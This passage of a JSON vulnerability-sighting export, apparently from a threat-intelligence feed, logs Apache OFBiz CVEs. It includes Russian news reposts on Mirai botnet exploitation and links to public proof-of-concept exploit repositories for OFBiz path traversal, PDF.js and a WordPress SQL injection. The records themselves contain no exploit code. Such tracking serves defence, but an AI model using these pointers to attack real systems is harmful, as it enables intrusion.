\u043e\u0434\u043d\u0438\u043c \u0438\u0437 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u044d\u0442\u0443 \u043e\u0448\u0438\u0431\u043a\u0443, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0431\u043e\u0442\u043d\u0435\u0442 Mirai. \n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0433\u0440\u0435\u0441\u0441\u0438\u0432\u043d\u043e \u0432\u043e\u0437\u0440\u043e\u0441\u043b\u0430 \u0441 \u043a\u043e\u043d\u0446\u0430 \u0438\u044e\u043b\u044f.", "creation_timestamp": "2024-08-05T13:04:05.000000Z"}, {"uuid": "e574c0da-e736-4ded-9b96-890e3ea61a4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2590", "content": "https://github.com/Mr-xn/CVE-2024-32113\n\nApache OFBIZ Path traversal leading to RCE POC\n#github #poc #exploit", "creation_timestamp": "2024-06-05T16:07:22.000000Z"}, {"uuid": "9f1b67fe-ecfa-491f-b757-819a0f8764d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "https://t.me/ctinow/221115", "content": "Increased Activity Against Apache OFBiz CVE-2024-32113, (Wed, Jul 31st)\nhttps://ift.tt/glFqA6d", "creation_timestamp": "2024-07-31T20:34:28.000000Z"}, {"uuid": "11906ffd-a6fe-4023-9a73-a1f6557b691d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "https://t.me/true_secator/6065", "content": "\u0412 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 ERP \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c Apache OFBiz \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f 0-day, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0434\u043e \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430\u0445.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a\u00a0CVE-2024-38856 \u0438 \u0438\u043c\u0435\u0435\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 9,8 \u0438\u0437 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0445 10,0, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044f \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Apache OFBiz \u0434\u043e 18.12.15.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0448\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 SonicWall, \u043e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0443\u043d\u043a\u0446\u0438\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u044b\u0447\u043d\u043e \u0442\u0440\u0435\u0431\u0443\u044e\u0442 \u0432\u0445\u043e\u0434\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443, \u0447\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043f\u0443\u0442\u044c \u0434\u043b\u044f RCE.\n\n\u041a\u0430\u043a \u043f\u043e\u044f\u0441\u043d\u044f\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, CVE-2024-38856 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u043e\u0439 CVE-2024-36104, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u0438\u044e\u043d\u044f \u0441 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c 18.12.14.\n\n\u041e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0444\u0443\u043d\u043a\u0446\u0438\u0435\u0439 \u043f\u0435\u0440\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u043c \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u043c \u0442\u043e\u0447\u043a\u0430\u043c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438\u00a018.12.15\u00a0\u0438\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0435\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 OFBiz \u0443\u0436\u0435 \u0431\u0435\u0437 \u0442\u043e\u0433\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u043f\u043e\u043b\u0435 \u0437\u0440\u0435\u043d\u0438\u044f \u0445\u0430\u043a\u0435\u0440\u043e\u0432, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Mirai, \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e CVE-2024-32113.", "creation_timestamp": "2024-08-07T11:58:50.000000Z"}, {"uuid": "4bb7140d-54a2-44f8-a7a6-c9c7857b6f71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-32114.yaml", "content": "", "creation_timestamp": "2026-05-02T17:06:19.000000Z"}, {"uuid": "0bbd38e2-3cb1-441a-8d35-c68c86967c8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10540", "content": "#exploit\n1. CVE-2024-32113:\nApache OFBiz Directory Traversal\nhttps://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit\n]-&gt; https://github.com/Mr-xn/CVE-2024-32113\n\n2. CVE-2024-4367:\nArbitrary JavaScript execution in PDF.js\nhttps://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js\n\n3. CVE-2024-33559:\nWordPress Theme XStore 9.3.8 - SQLi\nhttps://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection", "creation_timestamp": "2024-06-06T05:45:52.000000Z"}]}